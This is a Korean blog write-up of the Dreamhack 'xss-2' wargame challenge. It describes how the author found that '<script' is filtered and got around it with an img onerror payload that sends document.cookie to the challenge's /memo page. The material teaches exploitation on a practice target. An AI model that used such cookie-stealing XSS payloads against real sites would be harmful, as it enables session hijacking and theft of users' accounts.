xss-2

2023. 5. 19. 11:43·Wargame/Dreamhack
728x90
반응형

1. intro

2. code 및 분석

2.1.  code

xss-1과 다른 부분은 아래 한 곳이다.

@app.route("/vuln")
def vuln():
    return render_template("vuln.html")

2.2. 분석

xss-1과 동일하지만, 이번에는 받아들인 값을 바로 인자로 사용하지 않는다는 점이 차이점이다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

xss

3.2. 공격 준비

우선 vuln 페이지로 들어가봤더니 param이 alert를 실행하도록 되어있으나 반응하지 않는 것을 볼 수 있다.

이는 곧 <script>가 제대로 삽입되지 않는다는 것인데, 아무래도 문자열 필터링인 것 같다는 생각이 들었다.

테스트해보니 <s, </s, +가 필터링된다는 것을 알 수 있었다.

그래서 우회 코드를 조금 찾아보던 중

img src와 더불어 error 처리를 하는 onerror는 사용 가능함을 확인하였다.

 

 

4. exploit

<img src onerror='location.href="/memo?memo="+document.cookie'>

또는

<img src onerror='location.href="/memo?memo=" %2b document.cookie'>

 

다만 의문점은, +가 필터링되는 것으로 확인 했는데, 실제 공격 시에는 +가 그대로 적혀있어야 된다는 점...

왜지...?

728x90
반응형
저작자표시 비영리 변경금지 (새창열림)

'Wargame > Dreamhack' 카테고리의 다른 글

csrf-2  (0) 2023.05.21
csrf-1  (0) 2023.05.19
xss-1  (0) 2023.05.18
cookie  (0) 2023.05.18
session-basic  (0) 2023.05.18
'Wargame/Dreamhack' 카테고리의 다른 글
  • csrf-2
  • csrf-1
  • xss-1
  • cookie
wyv3rn
wyv3rn
아저씨의 흔한 취미. wyv3rn#1249
  • wyv3rn
    think storage
    wyv3rn
  • 전체
    오늘
    어제
    • 분류 전체보기 (502) N
      • To do list (7)
        • Doing (1)
        • Complete (6)
      • Diary (35)
      • Tips & theory (79) N
      • Kernel Exploit (27)
        • Theory (15)
        • Exercise (5)
      • Wargame (313)
        • pwn.college (34)
        • Dreamhack (148)
        • pwnable.kr (15)
        • Lord of Sqlinjection (3)
        • Cryptohack (20)
        • Root me (27)
        • CodeEngn (4)
        • Exploit Education (22)
        • ROP Emporium (8)
        • H4C (10)
        • Hackerchool (22)
      • CTF (41)
        • Solved (39)
        • Unsolved (2)
      • Script (0)
      • RubiyaLap (0)
  • 블로그 메뉴

    • 홈
    • 방명록
  • 링크

  • 공지사항

    • PWN wargame 모음 (및 느낀점)
    • 비공개 글들에 대해.
    • 뭐라도 하나 얻어가시길...
  • 인기 글

  • 태그

    Format String Bug
    tcache
    cryptohack
    FSB
    BOF
    x64
    RTL
    exploit education
    Me
    64bit
    libc
    phoenix
    la ctf
    root-me
    root
    docker
    heap
    Buffer Overflow
    dreamhack
    pwnable.kr
    lob
    x86
    hackerschool
    rop
    pwntools
    ROOT ME
    CANARY
    32bit
    _IO_FILE
    vtable
  • 최근 댓글

  • 최근 글

  • 250x250
    반응형
  • hELLO· Designed By정상우.v4.10.3
wyv3rn
xss-2
상단으로

티스토리툴바